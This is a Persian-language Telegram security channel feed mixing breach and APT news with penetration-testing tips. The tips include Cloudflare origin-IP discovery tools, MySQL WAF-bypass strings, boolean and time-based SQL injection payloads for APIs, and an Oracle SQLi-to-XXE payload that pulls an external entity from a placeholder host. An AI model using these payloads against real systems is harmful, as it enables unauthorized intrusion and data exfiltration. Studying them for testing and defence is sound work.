امنیت اطلاعات
847 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
راهکارهای پیدا کردن آی پی واقعی وبسایتهایی که از Cloudflare استفاده میکنند + ۲ ابزار برای این کار


https://www.secjuice.com/finding-real-ips-of-origin-servers-behind-cloudflare-or-tor/



ابزارها:
https://github.com/m0rtem/CloudFail
https://github.com/greycatz/CloudUnflare



#web
#pentest
#Cloudflare


@sec_nerd
Some MySQL tricks to break some #WAFs out there.

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

#SQLi #bypass #bugbountytip


@sec_nerd
بزرگترین دیتابیس کارتهای اعتباری شهروندان هندی در دارک نت به فروش گذاشته شد.
این دیتابیس حاوی اطلاعات کارتهای کردیت و دبیت بیش از 1.3 میلیون شهروند است که نزدیک به ۹۸ درصد آنان هندی هستند.
ارزش هر کارت ۱۰۰ دلار است بنابراین ارزش این دیتابیس ۱۳۰ میلیون دلار می باشد.
رکوردها حاوی اطلاعات magnetic strip نیز هستند که تمامی جزییات کارت از جمله مالک، شماره، تاریخ انقضا و احتمالا CVV و آدرس در آن وجود دارد.
این دیتابیس توسط گروه JokerStash یا همان Fin7 در دارک نت قرار داده شده است.


https://www.hackread.com/indian-credit-debit-card-records-on-dark-web/

#news
#breach
#india
#fin7


@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
ابزار blackwidow برای جمع آوری زیردامنه، ایمیل، شماره تلفن و عملیات فاز تمامی پارامترهای وبسایت برای آسیب پذیری های XXS , SQLI,RCE و path traversal

https://github.com/1N3/BlackWidow/


#web
#pentest
#sqli
#xss


@sec_nerd
استخراج تمامی آدرس های api از angularjs و فایلهای جاوا اسکریپت انگولار

curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u


#web
#pentest
#angular


@sec_nerd
محققان Cybereason کمپینی را شناسایی کردند که شرکتهای ارائه دهنده خدمات مخابراتی بزرگ را هدف قرار داده است.
این کمپین توسط گروه هکرهای چینی با کد شناسایی APT10 صورت گرفته و یک حمله ی چند جانبه است.
این حملات از سال ۲۰۱۲ در جریان بوده و با نام Operation Soft Cell شناخته میشود. به نظر میرسد عاملان این حمله به دنبال جزییات تماس های افراد در این زیرساختهای مخابراتی بوده اند.
هکرهای مذکور در هر موج از حمله پس از شناسایی شدن پس از چند ماه اقدام به حمله ی جدید با استفاده از ابزارها و روشهای نوین میکردند.


جزییات بیشتر و شرح فنی این حملات:

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers



#news
#apt10
#telecom


@sec_nerd
قفل (اثر انگشت) واتس اپ بالاخره برای اندروید فعال شد!

engt.co/33fWK8Y

#whatsapp
#android


@sec_nerd
آزمون آسیب پذیری Sql injection در apiها

Always start From : Boolean based >> Time based

{"id":"56456"} - OK
{"id":"56456 AND 1=1#"} -> OK
{"id":"56456 AND 1=2#"} -> ERROR
{"id":"56456 AND sleep(15)#"} -> SLEEP 15 SEC

#api
#web
#pentest
#sqli

@sec_nerd
مجموعه ماشین های مجازی برای تقویت قابلیت های تست نفوذ به وب


https://pastebin.com/dmqmBTwz


#web
#pentest
#lab


@sec_nerd
ایجاد http server برای دسترسی سریعتر به فایلهای روی سرور و برخی آزمون های حملاتی مانند XXE

python 2:
python -m SimpleHTTPServer 80


python 3:
python3 -m http.server 80



#python
#trick


@sec_nerd
تبدیل SQLi به XXE با استفاده از تابع xmltype

id=1'||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % evil SYSTEM "https://haxor.com ">%evil;]>'),'/l') from dual)||'



(قبلا به اشتباه xss تایپ شده بود که اصلاح شد)

#sqli
#xxe
#web
#bugbounty
#pentest


@sec_nerd